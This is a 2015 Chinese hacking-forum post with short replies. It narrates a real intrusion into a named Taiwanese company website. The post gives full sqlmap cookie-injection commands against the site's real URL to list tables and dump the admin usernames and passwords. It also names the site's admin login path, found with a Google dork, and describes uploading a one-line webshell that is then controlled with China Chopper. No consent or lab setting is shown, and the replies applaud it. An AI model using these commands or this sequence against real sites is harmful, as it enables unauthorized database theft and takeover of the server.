请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 8488|回复: 99

sqlmap实战cookie注入 (会员投稿)

  [复制链接]
  • TA的每日心情
    开心
    2015-11-26 12:26
  • 签到天数: 43 天

    [LV.5]常住居民I

    发表于 2015-8-30 14:27:39 | 显示全部楼层 |阅读模式
    此次视频教程为加入sss论坛学习



    目标站:http://www.qced.com.tw/
    先打开,找注入点
    有防注入系统



    我们试试sqlmap的cookie注入


    语句:sqlmap.py -u http://www.qced.com.tw/ProductShow.asp --cookie id=347 --level 2

    注入成功
    猜解表明



    语法:sqlmap.py -u http://www.qced.com.tw/ProductShow.asp --cookie id=347 --level 2 --tables

    猜到了admin


    然后列名
    语法:sqlmap.py -u http://www.qced.com.tw/ProductShow.asp --cookie id=347 --level 2 -T admin --columns

    猜到了username,password


    然后下载数据库里面的内容
    语法:sqlmap.py -u http://www.qced.com.tw/ProductShow.asp --cookie id=347 --level 2 -T admin -C username,password --dump


    解密
    这里是收费的
    但是谢谢拿破轮胎大哥帮助我已经解出来了



    然后找后台

    工具找不到

    怎么办呢?



    Google又不能访问

    那么我就换一种方式访问谷歌


    域名:https://iustudio.science/

    试试谷歌黑客看看能不能找到后台


    搜索:site:http://www.qced.com.tw/ inurl:login.asp


    找到了

    http://www.qced.com.tw/y4d93/Login.asp

    后台为这个

    然后密码的明文我就不提供了


    登录上去

    找上传点

    打开burp
    截取数据包看看
    试试明小子上传


    用默认的解析不好

    那我们试试一句话


    上传不上去


    然后我在我的团队下载了一个小马


    OK

    然后上传一句话

    菜刀链接成功

    谢谢大家观看!


    下载地址
    游客,如果您要查看本帖隐藏内容请回复


    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    昨天 16:36
  • 签到天数: 478 天

    [LV.9]以坛为家II

    发表于 2015-8-30 14:55:01 | 显示全部楼层
    反正我们都是学习的
  • TA的每日心情
    无聊
    7 天前
  • 签到天数: 163 天

    [LV.7]常住居民III

    发表于 2015-8-30 16:53:24 | 显示全部楼层
    有没有提权啊
  • TA的每日心情

    2017-3-5 23:09
  • 签到天数: 58 天

    [LV.5]常住居民I

    发表于 2015-8-30 17:25:01 | 显示全部楼层
    支持楼主!!!!!!
    回复

    使用道具 举报

  • TA的每日心情

    2017-2-25 20:11
  • 签到天数: 38 天

    [LV.5]常住居民I

    发表于 2015-8-30 19:40:52 | 显示全部楼层
    看看什么样的的
  • TA的每日心情
    无聊
    昨天 13:23
  • 签到天数: 158 天

    [LV.7]常住居民III

    发表于 2015-8-30 20:05:11 | 显示全部楼层
    我来看奶妈的教程
  • TA的每日心情

    昨天 12:23
  • 签到天数: 333 天

    [LV.8]以坛为家I

    发表于 2015-8-30 20:37:08 | 显示全部楼层
    sqlmap实战cookie注入 (会员投稿)
  • TA的每日心情

    2015-11-21 19:19
  • 签到天数: 38 天

    [LV.5]常住居民I

    发表于 2015-8-30 20:46:51 | 显示全部楼层
    看看               
  • TA的每日心情
    擦汗
    2017-3-15 00:43
  • 签到天数: 130 天

    [LV.7]常住居民III

    发表于 2015-8-30 22:54:06 | 显示全部楼层
    这种事怎么少的了我
    头像被屏蔽
  • TA的每日心情
    无聊
    2015-11-25 19:04
  • 签到天数: 42 天

    [LV.5]常住居民I

    发表于 2015-8-31 01:01:45 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-3-29 01:39 , Processed in 0.223058 second(s), 36 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表